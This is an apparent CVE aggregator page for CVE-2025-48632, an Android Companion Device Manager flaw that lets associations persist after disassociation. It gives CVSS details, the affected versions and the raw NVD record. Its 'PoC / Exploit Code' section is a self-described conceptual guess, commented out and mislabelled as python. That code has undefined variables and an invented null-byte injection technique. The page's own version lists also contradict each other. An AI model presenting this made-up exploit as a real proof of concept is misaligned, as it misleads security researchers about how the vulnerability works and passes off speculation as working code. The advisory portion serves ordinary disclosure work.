Security Vulnerability Report
中文
CVE-2025-48632 CVSS 7.8 HIGH

CVE-2025-48632

Published: 2025-12-08 17:16:19
Last Modified: 2025-12-08 20:15:52
Source: [email protected]

Description

In setDisplayName of AssociationRequest.java, there is a possible way to cause CDM associations to persist after the user has disassociated them due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android 10 (API level 29)
Android 11 (API level 30)
Android 12 (API level 31)
Android 12L (API level 32)
Android 13 (API level 33)
Android 14 (API level 34)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48632 PoC - Android Association Persistence After Disassociation // This PoC demonstrates the improper input validation in setDisplayName // Note: This is a conceptual PoC based on the vulnerability description // Actual exploitation requires Android device with Companion Device Manager /* import android.companion.CompanionDeviceManager; import android.content.ComponentName; import android.content.Intent; public class CVE_2025_48632_PoC { public void exploitAssociationPersistence() { // Step 1: Create a CompanionDeviceManager instance CompanionDeviceManager cdm = getSystemService(CompanionDeviceManager.class); // Step 2: Create AssociationRequest with malicious display name // The vulnerability allows special characters that bypass cleanup AssociationRequest request = new AssociationRequest.Builder() .setDisplayName("malicious_device\u0000persist") // Null byte injection .setDeviceType("sensor") .build(); // Step 3: Associate device cdm.associate(request, new CompanionDeviceManager.Callback() { @Override public void onDeviceFound(Intent intent) { startActivityForResult(intent, REQUEST_ASSOCIATE); } @Override public void onFailure(CharSequence error) { Log.e("CVE-2025-48632", "Association failed: " + error); } }, null); // Step 4: User disassociates device (appears to succeed) cdm.disassociate(associationId); // Step 5: Exploit - Association persists due to validation bypass // Check if association still exists List<AssociationInfo> associations = cdm.getMyAssociations(); // Step 6: Re-activate the persistent association // This grants elevated privileges without user consent if (associations.contains(maliciousAssociation)) { Log.i("CVE-2025-48632", "Vulnerability confirmed: Association persisted!"); } } } */ // Key vulnerability pattern: // The setDisplayName method does not properly sanitize input, // allowing null bytes or special characters that survive the disassociation cleanup process. // Reference: android.googlesource.com/platform/frameworks/base/+/de27b16b1af86d4ce18c9134d85b53331a8d2147

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48632", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.487", "lastModified": "2025-12-08T20:15:51.827", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In setDisplayName of AssociationRequest.java, there is a possible way to cause CDM associations to persist after the user has disassociated them due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/de27b16b1af86d4ce18c9134d85b53331a8d2147", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.